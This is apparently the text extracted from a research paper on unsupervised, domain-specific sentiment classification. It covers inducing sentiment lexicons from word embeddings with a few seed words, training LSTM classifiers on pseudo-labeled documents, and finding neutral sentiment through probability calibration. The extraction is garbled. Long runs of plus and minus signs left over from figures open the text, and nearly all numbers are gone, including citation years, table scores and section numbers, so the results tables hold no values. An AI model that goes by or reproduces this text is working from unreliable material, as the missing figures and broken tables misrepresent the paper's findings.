− −+ + + − + + − + − + − − − − + − − − − + − − − + − − − − − − + − − − − − − − − + − − − + + + − − − + + − − + − − − + − − − − − − − − − + − + + − − − − − − − − − + −+ − − − + − − + − + − + − + − − − − − − −+ + − − − − − + − − − − − − + − − − − + − + − − − − − − + − − − − + + − + − − − + + − + + + − − − + − + − −− + − + − + − − −+ + − + − − − − + − − − − − − (b) in the imdb (different domain) vector space. figure : sentiment words of finance in the same/different domain vector space. − − + − − + − + −− + − + − −− + − + + + + + + + + + − + − − − − − + + + − − + + − + + − + − − − − + + + + + − − − + − + + − − − − + − + − + − − + + + + + + − − + + + − + + + − + + − + − + − + + + + + + + + − + + + − + + − − − − − − + − − − + + − − + − − + + − − + − + + − + + − − − + − + + ++ − − + − + + + + − + + + − − − − + − − + − + − − + + + − − + + + − − + − + − + − + + − − + − − − − + − + + −− + + − + + + + − − + − − + − − − + − − − + − + − + − − − − − + + − + − − + + + − + − + − − − + + + + − − + − + + + − + + + + − + + − − + −− + − − − − − − + + − −− − − + + − − + + − − + + − − − − − + − − + − − − + + + − − − − − − + + − + + + − − − + − + + + + − − − + − − + + + + − − + − + − − − − + − − + + − − − − + + − + − − + + + − − − + + − − + + − + − − − −+ + + + + − + − − − + + − + − − + − − + − + + + − + + + − − − − − − − + − + − + − − + + + ++ − + − − + + + + +− + + − + − − + − + − − + − + − + + − − − − + − + + − + + − + − − + − − − + + − + + + + − + − − − −− − − − + − + + − − + − − − + + − + + + + − −+ − − − − − + − + + + + + − − + + + − + − − + + − + + − + + + + − − + − − − − − − − − + + + − + − + − + + + + + + + − − − − − + + + −+ + + + + − − − − + + + + + − − − − − − − + − + + − − + − − − − + − + − − + − − − − + + + + − + − − − − + − − + − + − + − + − − + + − − + + − − − + − +− − − + − − − + − − + + + + − + + − − + + + + − − + + − + + + + − + − − −+ − − + + + + − + + − − + − − + − − − − + − − + − + + + − + + − + − − − + + − − − + + − − + + − − + − − + + − − + + − + + + − − + + + + + + − − − + − − − − − + − + − − −+ − + + − − − − − + − − − + − + + − − + − − − + − − − − − + − − + + − + − − + + − − − − + − + + + + + + + + − + + + − + + + + − − − + − − + + − − + + − − − + − − − − − + − + + + − + + − ++ + − − + + − − + + − + + + − − + + − − + − + + + − − − − + −+ −− + − − + − − − + + + + − − − + + − + + − + − + − + − − − + + + − − + − − − + + + + + + + − − + + −− + + − − − − − − − + − + − − − − − − + + + + − − + + + − − + + − + + − + − + − + − + + + − − + − + − + + − − + − + + + + − − + + − + + + − − − + + + − + − − − + − + + − + − + − − − + + + − + + − + + − − + − + + + − + − − + − + − − − + − − − + − − − + + − + + + − − − − + + − − − −+ + − + + − + + + + − + − + + − + + + − − − + + − − + − + + + − − + − − + + − + + + − − − + − + − + − − + + −− − + + +− + − + + − + + + − − + + + − + + + − + − − − −− − + − − + − − − − − + − + − + + − + − − + − − − − + + − + + + + − + −+ − + + − + − + − + − + − + + −+ − + + + + + + − + + + + − + − −+ − + − + −+ ++ + + + + − + − − − − + + + + − − − − − + + − + + + + + + + + − − − − + − + + − − − + + + − + + − + + + + + + − + − − + − + + + −+ + + − − − + − + + + + − + − − + + − + − −+ + + + + − + − + − − + + + − − + − + + + − + + − − + − +− + − + − − − + − + − + − − − + + − − − − + − + − −+ + + + + + − + − − + + − − − + + + + + + + + + − − − + + + + + −+ + − − − + − + + + + − + − − − − − + + − + − + + − + − + − + + − + − − + − − − − − + − + + − + − − + + + − + − − − + − − + + − + + − + + − − − − − − + − − − − − − − − + − + − +− − + − − + + − − − − − (a) original/full. − − + + + − − + − −+ + + + − + − + + − −+ + + − + − + + + + − − + + + − − + + − + − + − + − − + − + − + − − + − − + − − − − + + − − − −− + + + + − − − − + − + + − + −− − + − − − − + − + + − − − + + − − − + + + + − + + + + + + + + − − − + − + + − + + − − − − − − − + + + − + + + − + − + − + + + − − − − − − + − − + − + − − − − + − − ++ +− − + + −− + − − − + + − + − + + + + − − − − − − − − − − +++ + − + + − − − + + − + + + + + + − − + + − − − − − + + − + + − − − + + − + + − − − + + − + + − − − + + + + + − − − − + − − + + + − + + − + + − + − + − − + + − + −+ − − − − − − − + + + − − + + + + − + + − − + − + + + − − − − − − + − + − + + + − + − − + − + − − − − − − + + + − + + + − + − + − + − + − − + − + − + − − + + − + + + + − − − − + − − − − − − (b) filtered. figure : sentiment words about movies in the imdb vector space before/after filtering. actly the same context which might suggest that they would result in similar word embeddings. for exam- ple, we could say “the room is good” and also “the room is bad”: both are legitimate sentences. the probable reason for the cluster hypothesis to be true is that in reality people tend to use positive sentiment words together much more often than to mix them with negative sentiment words, and vice versa. for example, it would be much more often for us to see sentences like “the room is clean and tidy” than “the room is clean but messy”. it is a long established fact in computational linguistics that words with similar meanings tend to occur nearby each other (miller and charles, ); sentiment words are no excep- tion (turney, ). moreover, it has been widely observed that online customer reviews are affected by the so-called love-hate self-selection bias: users tend to rate only products which they either like or hate, leading to a lot more -star and -star ratings than other (moderate) ratings; if the product is just average or so-so, they probably will not bother to leave reviews. the polarization of online customer reviews would also encourage the clustering of sen- timent words into opposite polarities. domain-specific sentiment lexicon induction given the word embeddings for a specific do- main, we can induce a customized sentiment lexi- con from a few typical sentiment words (“seeds”) frequently used in that particular domain. such an induced domain-specific sentiment lexicon plays a crucial role in the pipeline towards domain-specific document-level sentiment classification. table shows the seed words for five different do- mains which are identical to those used by hamilton et al. ( ) except for the two additional domains imdb and amazon. the induction of a sentiment lexicon could then be formulated as a simple word sentiment classification problem with two classes (positive vs. negative). each word is represented as a vector via domain-specific word embedding; the seed words are labeled with their correspond- ing classes while all the other words (i.e., “candi- dates”) are unlabeled; the task here is to learn a clas- sifier from the labeled examples first and then apply it to predict the sentiment polarity of each unlabeled candidate word. the probabilistic outputs of such a word sentiment classifier could be regarded as the measure of confidence about the predicted sentiment polarity. in the end, those candidate words with a high probability of being either positive or negative would be added to the sentiment lexicon. the final induced sentiment lexicon would include both the seed words and the selected candidate words. as pointed out by mudinas et al. ( ), if we simply consider all words from the given corpus as candidate words, the above described word senti- ment classifier tends to assign sentiment values not only to the actual sentiment words but also to their associated product features or more generally the as- pects of the expressed view. for example, if a lot of customers do not like the weight of a product, the word sentiment classifier may assign strong nega- tive sentiment to “weight”, yet this is not stable — the sentiment polarity of “weight” may be different when a new version of the product is released or the customer population has changed, and furthermore it probably does not apply to other products. to avoid this potential issue, it would be necessary to consider only a high-quality list of candidate words which are likely to be genuine sentiment words. such a list of candidate words could be obtained directly from general-purpose sentiment lexicons. it is also possi- ble to perform nlp on the target domain corpus and extract frequently-occurring adjectives or other typi- cal sentiment indicators like emoticons as candidate words, which is beyond the scope of this paper. to examine the effectiveness of different ma- chine learning algorithms for building such domain- specific word sentiment classifiers, we attempt to recreate known sentiment lexicons in three domains: standard-english, twitter, and finance (see sec- tion ), in the same way as hamilton et al. ( ) did. put differently, for the purpose of evaluation, we would just use a known sentiment lexicon in the corresponding domain as the list of candidate words and see how different machine learning algorithms would classify those candidate words based on their domain-specific word embeddings. for those lexi- cons with ternary sentiment classification (positive vs. neutral vs. negative), the class-mass normal- ization method (zhu et al., ) used by hamilton et al. ( ) has been applied here to identify the neutral category. the quality of each induced lex- icon for a specific domain is evaluated by compar- ing it with its corresponding known lexicon as the ground-truth, according to the performance metrics which are the same as in (hamilton et al., ): area under the receiver-operating-characteristic (roc) curve (auc) for the binary classifications (ignoring the neutral class, as is common in pre- vious work) and kendall’s τ rank correlation co- efficient with continuous human-annotated polarity scores. note that kendall’s τ is not suitable for the finance domain, as its known sentiment lexicon is only binary. therefore, our experimental setting and performance measures are all identical to those of hamilton et al. ( ), which ensures the validity of the empirical comparison between our approach and theirs. in table , we compare a number of typical su- pervised and semi-supervised/transductive learning algorithms for word sentiment classification in the context of domain-specific sentiment lexicon induc- corpus positive negative standard-english good, lovely, excellent, fortunate, pleasant, delightful, perfect, loved, love, happy bad, horrible, poor, unfortunate, unpleasant, disgusting, evil, hated, hate, unhappy twitter love, loved, loves, awesome, nice, amazing, best, fantastic, correct, happy hate, hated, hates, terrible, nasty, awful, worst, horrible, wrong, sad finance successful, excellent, profit, beneficial, im- proving, improved, success, gains, positive negligent, loss, volatile, wrong, losses, dam- ages, bad, litigation, failure, down, negative imdb good, excellent, perfect, happy, interesting, amazing, unforgettable, genius, gifted, in- credible bad, bland, horrible, disgusting, poor, banal, shallow, disappointed, disappointing, lifeless, simplistic, bore amazon imdb domain seeds (as above) plus positive, fortunate, correct, nice imdb domain seeds (as above) plus negative, unfortunate, wrong, terrible, inferior table : the “seeds” for domain-specific sentiment lexicon induction. tion: • knn — k nearest neighbors (hastie et al., ), • lr — logistic regression (hastie et al., ), • svmlin — support vector machine with the lin- ear kernel (joachims, ), • svmrbf — support vector machine with the non- linear rbf kernel (joachims, ), • tsvm — transductive support vector machine (joachims, ), • s vm — semi-supervised support vector ma- chine (gieseke et al., ), • cple — contrastive pessimistic likelihood es- timation (loog, ), • sgt — spectral graph transducer (joachims, ), • sentprop — a label propagation based classifica- tion method proposed for the socialsent system (hamilton et al., ). the suitable parameter values of the above learning algorithms (such as the c for svm) are found via grid search with cross-validation, and the probabilis- tic outputs are given by platt scaling (platt, ) if they are not provided by the original learning algo- rithm. the experimental results shown in table demonstrate that in almost every single domain, simple linear model based supervised learning al- gorithms (lr and svmlin) can achieve the op- timal or near-optimal accuracy for the sentiment lexicon induction task, and they outperform the state-of-the-art sentiment lexicon induction method sentprop (hamilton et al., ) by a large mar- gin. the performance improvements are statisti- cally significant (p-value < . ) according to the sign test. there does not seem to be any benefit of utilizing non-linear models (knn and svmrbf ) or semi-supervised/transductive learning algorithms (tsvm, s vm, cple, sgt, and sentprop). the qualitative analysis of the sentiment lexicons in- duced by different methods shows that they differ only on those borderline, ambiguous words (such as “soft”) residing in the noisy overlapping region between two clusters in the vector space (see sec- tion ). in particular, sentprop is based on label propagation over the lexical graph of words, so it could be easily misled by noisy borderline words when sentiment clusters have considerable over- lap with each other, kind of “over-fitting” (bishop, ). furthermore, according to our experiments on the same machine, those simple linear models are + times faster than sentprop. the speed dif- ference is mainly due to the fact that supervised learning algorithms only need to train on a small number of labeled words (“seeds” in our context) while semi-supervised/transductive learning algo- rithms need to train on not only a small number of labeled words but also a large number of unlabeled words. it has also been observed in our experiments that there is a typical precision/recall trade-off (man- ning et al., ) for the automatic induction of se- mantic lexicons. assuming that the classified candi- date words are added to the lexicon in the descend- ing order of their probabilities (of being either pos- itive or negative), the induced lexicon will be nois- ier and noisier when it becomes bigger and bigger. corpus supervised semi-supervised/transductive knn lr svmlin svmrbf tsvm s vm cple sgt sentprop auc standard-english . . . . . . . . . twitter . . . . . . . . . finance . . . . . . . . . τ standard-english . . . . . . . . . twitter . . . . . . . . . table : comparing the induced lexicons with their corresponding known lexicons (ground-truth) according to the ranking of sentiment words measured by auc and kendall’s τ. fig. shows that imposing a higher cut-off prob- ability threshold (for candidate words to enter the induced lexicon) would decrease the size of the in- duced lexicon but increase its quality (accuracy). on one hand, the induced lexicon needs to contain a suf- ficient number of sentiment words, especially when detecting sentiment from short texts, as a lexicon- based method cannot reasonably classify documents with none or too few sentiment words. on the other hand, the noise (misclassified sentiment words) in the induced lexicon would obviously have a detri- mental impact on the accuracy of the document sen- timent classifier built on top of it. contrary to most previous work like that from qiu et al. ( ) which tries to expand the sentiment lexicon as much as pos- sible and thus maintain a high recall, we would put more emphasis on the precision and keep a tight con- trol of the lexicon size. for us, having a small senti- ment lexicon is affordable, because our proposed ap- proach to document sentiment classification will be able to mitigate the low recall problem of lexicon- based methods by combining them with learning- based methods, which we shall talk about next. domain-specific sentiment classification of documents a domain-specific sentiment lexicon, automatically induced using the above technique, provides a solid basis for building domain-specific document senti- ment classifiers. for the experiments here, we would use a list of candidate words constructed by merging two well-known general-purpose sentiment lexicons that are both publicly available — the ‘gen- eral inquirer’ (stone et al., ) and the sentiment lexicon from liu ( ). this set of candidate words is itself a combined, general-purpose sentiment lex- accuracy vs size . . . . ac cu rac y . . . . . cutoff probability nu mb er of wo rds figure : how the accuracy and size of an in- duced lexicon are influenced by the cut-off proba- bility threshold. icon, so we name it the gi+bl lexicon. moreover, we would set the cut-off probability threshold to a generally good value . in our sentiment lexicon induction algorithm. comparing the imdb vector space including all the candidate words (fig. a) with that including only the high-probability candi- date words (fig. b), it is obvious that the positive and negative sentiment clusters become more clearly separated in the latter. the induced sentiment lexicon on its own could be applied directly in a lexicon-based method for sentiment classification of documents, and a reason- ably good performance could be achieved as we will show later in table . however, most of the time, lexicon-based sentiment classifiers are not as effec- tive as learning-based sentiment classifiers. one rea- son is that the former tends to suffer from a poor recall. for example, with a limited size sentiment lexicon, lexicon-based methods would often fail to detect the sentiment present in short texts, e.g., from twitter, due to the lexical gap. given the induced sentiment lexicon, we propose to use a lexicon-based sentiment classifier to classify unlabeled documents, and then use those classified documents containing at least three sentiment words as pseudo-labeled documents to be used later for the training of a learning-based sentiment classifier. the condition of “at least three sentiment words” is to ensure that only reliably classified documents would be further utilised as training examples. . sentiment classification of long texts first, we try the induced sentiment lexicons in the lexicon-based sentiment classifier psenti (mudinas et al., ) to see how good they are. given a sen- timent lexicon, psenti is able to perform not only binary sentiment classification but also ordinal sen- timent classification on a five-point scale. to mea- sure the binary classification performance, we use both micro-averaged f (mif ) and macro-averaged f (maf ) which are commonly used in text catego- rization (yang and liu, ). to measure the five- point scale classification performance, we use both cohen’s κ coefficient (manning et al., ) and also root-mean-square error (rmse) (bishop, ). as the baseline, we use a combined general- purpose sentiment lexicon, gi+bl, mentioned pre- viously in section . as we can see from the results shown in table , using the induced sentiment lex- icon for the target domain would make the lexicon- based sentiment classifier psenti perform better than simply employing an existing general-purpose sen- timent lexicon. moreover, using the sentiment lex- icons induced from the same domain would lead a much better performance than using the sentiment lexicons induced from a different domain. second, to evaluate the proposed two-phase boot- strapping method, we make empirical comparisons on the imdb and amazon datasets using a number of representative methods for document sentiment classification: • psenti — a concept-level lexicon-based sentiment classifier (mudinas et al., ), • problex-dcm — a probabilistic lexicon-based classification using the dirichlet compound multinomial (dcm) likelihood to reduce effective counts for repeated words (eisenstein, ), • svmlin — support vector machine with linear kernel (joachims, ), • cnn — convolutional neural network (kim, ), • lstm — long short-term memory, a recurrent neural network (rnn) that can remember val- ues over arbitrary time intervals (hochreiter and schmidhuber, ; dai and le, ). to apply the deep learning algorithms cnn and lstm that have a word embedding projection layer, we fix t he r eview s ize t o w ords, t runcating re- views longer than that and padding reviews shorter than that with null values. as pointed out by greff et al. ( ), the hidden layer size is an important hyperparameter of lstm: usually the larger the net- work, the better the performance but the longer the training time. in our experiments, we have used an lstm network with units on the hidden layer which is the capacity that a pc with one nvidia gtx ti gpu can afford and a dropout (wager et al., ) rate of . which is the most common setting in research literature (srivastava et al., ; hong and fang, ; cliche, ). as shown in table , the above described two- phase bootstrapping method has been demonstrated to be beneficial: t he l earning-based s entiment clas- sifiers t rained o n p seudo-labeled d ata a re supe- rior to lexicon-based sentiment classifiers, including the state-of-the-art unsupervised sentiment classifier problex-dcm (eisenstein, ). furthermore, the two-phase bootstrapping method is a general frame- work which can utilize any lexicon-based sentiment classifier t o p roduce p seudo-labeled d ata. there- fore the more sophisticated problex-dcm could also be used instead of psenti in this framework, which is likely to deliver an even higher perfor- mance. among the three learning-based sentiment classifiers, lstm achieved the best performance on both datasets, which is consistent with the observa- tions in other studies like dai and le ( ). comparing the lstm-based sentiment classifiers trained on pseudo-labeled and real labeled data, we can also see that using a large number of pseudo- labeled examples could achieve a similar effect as using / ≈ k and / = k real labeled ex- amples for imdb and amazon respectively. this suggests that the unsupervised approach is actually preferable to the supervised approach if there are lexicon binary -point scale mif maf f pos f neg cohen’s κ rmse general-purpose gi+bl . . . . . . domain-specific same domain (kitchen) . . . . . . different domain (electronics) . . . . . . different domain (video) . . . . . . table : lexicon-based sentiment classification of amazon kitchen product reviews. method imdb amazon auc f auc f unsupervised lexicon- based psenti with existing general-purpose lexicon . . . . psenti with induced domain-specific lexicon . . . . problex-dcm (eisenstein, ) . . . . learning- based svmlin trained on pseudo-labeled data . . . . cnn trained on pseudo-labeled data . . . . lstm trained on pseudo-labeled data . . . . supervised learning- based lstm trained on real labeled data (full size) . . . . ” ( / size) . . . . ” ( / size) . . . . ” ( / size) . . . . table : sentiment classification of long texts. only a few thousand (or less) labeled examples. . sentiment classification of short texts to evaluate our proposed approach to sentiment classification of short texts, we have carried out experiments on the twitter sentiment classification benchmark dataset from semeval- task b (rosenthal et al., ) which is to classify tweets as either positive or negative. other than the training set of , tweets, we also collected un- labeled tweets using the twitter api. all the tweets would be pre-processed by replacing emoticons with their corresponding text representations and encod- ing urls by tokens. in addition to the twitter- domain seed words listed in table , we have also made use of common positive/negative emoticons which are ubiquitous on twitter as additional seeds for the task of sentiment lexicon induction. note that in all our experiments, we do not use the sen- timent labels and the topic information provided in the training data. making use of the provided training data and our own unlabeled data collected from twitter, we have constructed the domain-specific word embeddings, induced the sentiment lexicon, and bootstrapped the pseudo-labeled tweet data to train the binary tweet sentiment classifier. as the learning algorithm we have chosen lstm with a hidden layer of units which would be enough for tweets as they are quite short (with an average length of only words). the official performance measures for this short text sentiment classification task (rosenthal et al., ) include accuracy (acc) and f . although our approach is nearly-unsupervised (without any reliance on labeled documents), its performance on this benchmark dataset is comparable to that of su- pervised methods: it would be placed roughly in the middle of all the participating systems in this com- petition (see table ). . detecting neutral sentiment many real-world applications of sentiment classifi- cation (e.g., on social media) are not simply a bi- nary classification task, but involve a neutral cate- gory as well. although many lexicon-based sen- timent classifiers including psenti can detect neu- tral sentiment, extending the above learning-based sentiment classifier (trained on pseudo-labeled data) system acc f unsupervised baseline all positive . . baseline all negative . . ourslstm . . supervised worst system . . median system . . best system . . table : sentiment classification of short texts into two categories — semeval- task b. to recognize neutral sentiment is challenging. to investigate this issue, we have done experiments on the twitter sentiment classification benchmark dataset from semeval- task c (rosenthal et al., ) which is to classify tweets into an ordinal five-point scale (− , − , , + , + ) where represents the neutral class. one common way to handle neutral sentiment is to treat the set of neutral documents as a sepa- rate class for the classification algorithm, which is the method advocated by koppel and schler ( ). with the pseudo-labeled training examples of three classes (− : negative, : neutral, and + : posi- tive), we tried both standard multi-class classifica- tion (hsu and lin, ) and ordinal classification (frank and hall, ). however, neither of them could deliver a reasonable performance. after care- fully inspecting the classification results, we realised that it is very difficult to have a set of representative training examples with good coverage for the neu- tral class. this is because the neutral class is not homogeneous: a document could be neutral because it is equally positive and negative, or because it does not contain any sentiment. in practice, the latter case is more often seen than the former case, and it im- plies that the neutral class is more often defined by the absence of sentiment word features rather than their presence, which would be problematic to most supervised learning algorithms. what we discovered is that the simple method of identifying neutral documents from the binary sentiment classifier’s decision boundary works sur- prisingly well, as long as the right thresholds are found. specifically, we take the probabilistic out- puts of a binary sentiment classifier trained as be- fore, and then put all the documents whose proba- bility of being positive lies not close to , not close to , but in the middle range into the neutral class. it turns out that probability calibration (niculescu- mizil and caruana, ) is crucially important for this simple method to work. some supervised learn- ing algorithms for classification can give poor es- timates of the class probabilities, and some even do not support probability prediction. for instance, maximum-margin learning algorithms such as svm focus on hard samples that are close to the deci- sion boundary (the support vectors), which makes their probability prediction biased. the technique of probability calibration allows us to better calibrate the probabilities of a given classifier, or to add sup- port for probability prediction. if a classifier is well calibrated, its probabilistic output should be able to be directly interpreted as a confidence level on the prediction. for example, among the documents to which such a calibrated binary classifier gives a probabilistic output close to . , approximately % of the documents would actually belong to the posi- tive class. using the sigmoid model of platt ( ) with cross-validation on the pseudo-labeled training data, we carry out probability calibration for our lstm based binary sentiment classifier. fig. shows that the calibrated probability prediction aligns with the true confidence of prediction much better than the raw probability prediction. in this case, the brier loss (brier, ) that measures the mean squared difference between the predicted probability and the actual outcome could be reduced from . to . by probability calibration. if we rank the estimated probabilities of being positive from low to high, the curve of probabili- ties would be in an “s”-shape with a distinct middle range where the slope is steeper than the two ends, as shown in fig. . the documents with their probabil- ities of being positive in such a middle range should be neutral. therefore the two elbow points in the probability curve would make appropriate thresh- olds for the identification of neutral sentiment, and they could be found automatically by a simple algo- rithm using the central difference to approximate the second derivative. let pl and pu denote the identi- fied thresholds (pl < pu ), then we assign class label “− ” to all those documents with the probability be- low pl , “+ ” to all those documents with the proba- system maeµ maem mif maf unsupervised baseline all - . . . . baseline all - . . . . baseline all . . . . baseline all + . . . . baseline all + . . . . lexicon-based . . . . ourslstm . . . . supervised worst system . . . . median system . . . . best system . . . . table : sentiment classification of short texts on a five-point scale — semeval- task c. . . . . . . mean predicted value . . . . . . fr ac tio n of p os iti ve s raw ( . ) calibrated ( . ) perfectly calibrated ( ) figure : the probability calibration plot of our lstm-based sentiment classifier on the semeval- task c dataset. bility above pu , and “ ” to all those documents with the probability within [pl,pu]. the official performance measures for this sen- timent classification task (rosenthal et al., ) are maeµ and maem which stand for micro- averaged and macro-averaged mean absolute er- ror (mae), respectively. we would also like to report the micro-averaged and macro-averaged f scores which are denoted as mif and maf respec- tively. as shown in fig. , the thresholds identi- fied from the raw probability curve are roughly at percentile and percentile, which would yield maeµ = . and maem = . ; the thresh- olds identified from the calibrated probability curve are roughly at percentile and percentile, which would yield much better scores maeµ = . and maem = . . so with the help of probabil- ity calibration, our proposed approach would be able to comfortably beat all the baselines including the lexicon-based method psenti (mudinas et al., ) and compete with the average (median) participat- ing systems (see table ). please note that this is not a fair comparison: our approach is at a great disadvantage because (i) it is nearly-unsupervised, without any reliance on labeled documents while all the other systems are supervised; and (ii) it performs only ternary classification while all the other sys- tems make classification on the full five-point scale. conclusions how far can we go in sentiment classification for a new domain, given only unlabeled data? this pa- per presents our exploration towards answering the above research question. specifically, the main con- tributions of this paper are as follows. • we have formulated the cluster hypothesis for sentiment analysis (i.e., words with different sen- timent polarities form distinct clusters) and veri- fied that in general it holds for word embeddings within a specific domain but not across domains. • we have demonstrated that a quality domain- specific sentiment lexicon can be induced from the word embeddings of that domain together with just a few seed words. surprisingly, simple lin- ear model based supervised learning algorithms (such as linear svm) are good enough for this purpose; there is no benefit of utilizing non-linear models or semi-supervised/transductive learning algorithms due to the noise at the borders of sen- timent word clusters. using such linear models percentile . . . . . . pr ob ab ili ty (a) raw percentile . . . . . . pr ob ab ili ty (b) calibrated figure : the probability curve with a region of intermediate probabilities representing the neutral class. our system clearly outperforms the state-of-the- art sentiment lexicon induction method — sent- prop (hamilton et al., ). • we have shown that a lexicon-based sentiment classifier could be enhanced by using its out- puts as pseudo-labels and employing supervised learning algorithms such as lstm to train a learning-based sentiment classifier on pseudo- labeled documents. our end-to-end pipelined ap- proach which, overall, is unsupervised (except for a very small set of seed words), works bet- ter than the state-of-the-art unsupervised tech- nique for document sentiment classification — problex-dcm (eisenstein, ), and its perfor- mance is at least on par with an average fully supervised sentiment classifier trained on real la- beled data (rosenthal et al., ). • we have revealed the crucial importance of prob- ability calibration to the detection of neutral sen- timent which was overlooked in previous studies (koppel and schler, ). with the right thresh- olds found, neutral documents can be simply iden- tified at the binary sentiment classifier’s decision boundary. one promising way to further enhance the lstm- based sentiment classifier in the proposed approach with the induced sentiment lexicon would be to con- catenate word embeddings with an indicator feature which tells whether a current word is positive, neu- tral, or negative (ebert et al., ). we leave this for future work. acknowledgements the titan x pascal gpu used for this research was kindly donated by the nvidia corporation. we thank the reviewers for their constructive and help- ful comments. we also gratefully acknowledge the support of geek.ai for this work. references shlomo argamon, casey whitelaw, paul j. chase, sob- han raj hota, navendu garg, and shlomo levitan. . stylistic text classification using functional lexi- cal features. journal of the american society for infor- mation science and technology (jasist), ( ): – . christopher m. bishop. . pattern recognition and machine learning. springer-verlag. john blitzer, mark dredze, and fernando pereira. . biographies, bollywood, boom-boxes and blenders: domain adaptation for sentiment classification. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages –– , prague, czech republic. danushka bollegala, david j. weir, and john a. car- roll. . cross-domain sentiment classification us- ing a sentiment sensitive thesaurus. ieee transac- tions on knowledge and data engineering (tkde), ( ): – . johan bollen, huina mao, and xiao-jun zeng. . twitter mood predicts the stock market. journal of computational science, ( ): – . glenn w. brier. . verification of forecasts ex- pressed in terms of probability. monthly weather re- view, ( ): – . mathieu cliche. . bb twtr at semeval- task : twitter sentiment analysis with cnns and lstms. in proceedings of the th international workshop on se- mantic evaluation (semeval@acl ), pages – , vancouver, canada. andrew m. dai and quoc v. le. . semi-supervised sequence learning. in advances in neural information processing systems : annual conference on neural information processing systems (nips), pages – , montreal, canada. xiaowen ding, bing liu, and philip s. yu. . a holistic lexicon-based approach to opinion mining. in proceedings of the international conference on web search and web data mining (wsdm), pages – , palo alto, ca, usa. sebastian ebert, ngoc thang vu, and hinrich schütze. . a linguistically informed convolutional neu- ral network. in proceedings of the th workshop on computational approaches to subjectivity, sentiment and social media analysis (wassa@emnlp), pages – , lisbon, portugal. jacob eisenstein. . unsupervised learning for lexicon-based classification. in proceedings of the st aaai conference on artificial intelligence (aaai), pages – , san francisco, ca, usa. ethan fast, binbin chen, and michael s. bernstein. . empath: understanding topic signals in large- scale text. in proceedings of the chi conference on human factors in computing systems (chi), pages – , san jose, ca, usa. eibe frank and mark a. hall. . a simple approach to ordinal classification. in proceedings of the th european conference on machine learning (ecml), pages – , freiburg, germany. fabian gieseke, antti airola, tapio pahikkala, and oliver kramer. . sparse quasi-newton opti- mization for semi-supervised support vector machines. in proceedings of the st international conference on pattern recognition applications and methods (icpram), pages – , vilamoura, algarve, portu- gal. xavier glorot, antoine bordes, and yoshua bengio. . domain adaptation for large-scale sentiment classification: a deep learning approach. in pro- ceedings of the th international conference on ma- chine learning (icml), pages – , bellevue, wa, usa. yoav goldberg. . neural network methods for natu- ral language processing. synthesis lectures on human language technologies, ( ): – . klaus greff, rupesh kumar srivastava, jan koutnı́k, bas r. steunebrink, and jürgen schmidhuber. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems (tnnls), ( ): – . william l. hamilton, kevin clark, jure leskovec, and dan jurafsky. . inducing domain-specific senti- ment lexicons from unlabeled corpora. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , austin, tx, usa. trevor hastie, robert tibshirani, and jerome friedman. . the elements of statistical learning: data mining, inference, and prediction. springer, nd edi- tion. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . james hong and michael fang. . sentiment anal- ysis with deeply learned distributed representations of variable length texts. technical report, stanford uni- versity. chih-wei hsu and chih-jen lin. . a comparison of methods for multiclass support vector machines. ieee transactions on neural networks (tnn), ( ): – . minqing hu and bing liu. . mining and summa- rizing customer reviews. in proceedings of the th acm sigkdd international conference on knowl- edge discovery and data mining (kdd), pages – , seattle, wa, usa. yohan jo and alice h. oh. . aspect and sentiment unification model for online review analysis. in pro- ceedings of the th international conference on web search and web data mining (wsdm), pages – , hong kong, china. thorsten joachims. . text categorization with sup- port vector machines: learning with many relevant features. in proceedings of the th european confer- ence on machine learning (ecml), pages – , chemnitz, germany. thorsten joachims. . transductive inference for text classification using support vector machines. in proceedings of the th international conference on machine learning (icml), pages – , bled, slovenia. thorsten joachims. . transductive learning via spectral graph partitioning. in proceedings of the th international conference on machine learning (icml), pages – , washington, dc, usa. yoon kim. . convolutional neural networks for sen- tence classification. in proceedings of the con- ference on empirical methods in natural language processing (emnlp), pages – , doha, qatar. moshe koppel and jonathan schler. . the im- portance of neutral examples for learning sentiment. computational intelligence, ( ): – . yann lecun, yoshua bengio, and geoffrey e. hinton. . deep learning. nature, ( ): – . heeyoung lee, mihai surdeanu, bill maccartney, and dan jurafsky. . on the importance of text anal- ysis for stock price prediction. in proceedings of the th international conference on language resources and evaluation (lrec), pages – , reykjavik, iceland. chenghua lin and yulan he. . joint sentiment/topic model for sentiment analysis. in proceedings of the th acm conference on information and knowledge management (cikm), pages – , hong kong, china. bing liu. . sentiment analysis and opinion mining. synthesis lectures on human language technologies, ( ): – . bing liu. . sentiment analysis — mining opin- ions, sentiments, and emotions. cambridge univer- sity press. marco loog. . contrastive pessimistic likelihood estimation for semi-supervised classification. ieee transactions on pattern analysis and machine intel- ligence (tpami), ( ): – . andrew l. maas, raymond e. daly, peter t. pham, dan huang, andrew y. ng, and christopher potts. . learning word vectors for sentiment analysis. in pro- ceedings of the th annual meeting of the association for computational linguistics (acl), pages – , portland, or, usa. christopher d. manning, prabhakar raghavan, and hin- rich schütze. . introduction to information re- trieval. cambridge university press. julian j. mcauley and jure leskovec. . hidden fac- tors and hidden topics: understanding rating dimen- sions with review text. in proceedings of the th acm conference on recommender systems (recsys), pages – , hong kong, china. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . distributed rep- resentations of words and phrases and their composi- tionality. in advances in neural information process- ing systems : annual conference on neural infor- mation processing systems (nips), pages – , lake tahoe, nv, usa. george a miller and walter g charles. . contex- tual correlates of semantic similarity. language and cognitive processes, ( ): – . saif m. mohammad and peter d. turney. . emo- tions evoked by common words and phrases: using mechanical turk to create an emotion lexicon. in pro- ceedings of the naacl hlt workshop on com- putational approaches to analysis and generation of emotion in text (caaget), pages – , los ange- les, ca, usa. andrius mudinas, dell zhang, and mark levene. . combining lexicon and learning based approaches for concept-level sentiment analysis. in proceedings of the st international workshop on issues of sentiment discovery and opinion mining (wisdom@kdd), pages : – : , beijing, china. alexandru niculescu-mizil and rich caruana. . predicting good probabilities with supervised learning. in proceedings of the nd international conference on machine learning (icml), pages – , bonn, germany. sara owsley, sanjay sood, and kristian j. hammond. . domain specific affective classification of doc- uments. in aaai spring symposium: computational approaches to analyzing weblogs, pages – , stanford, ca, usa. sinno jialin pan, xiaochuan ni, jian-tao sun, qiang yang, and zheng chen. . cross-domain senti- ment classification via spectral feature alignment. in proceedings of the th international conference on world wide web (www), pages – , raleigh, nc, usa. bo pang and lillian lee. . a sentimental education: sentiment analysis using subjectivity 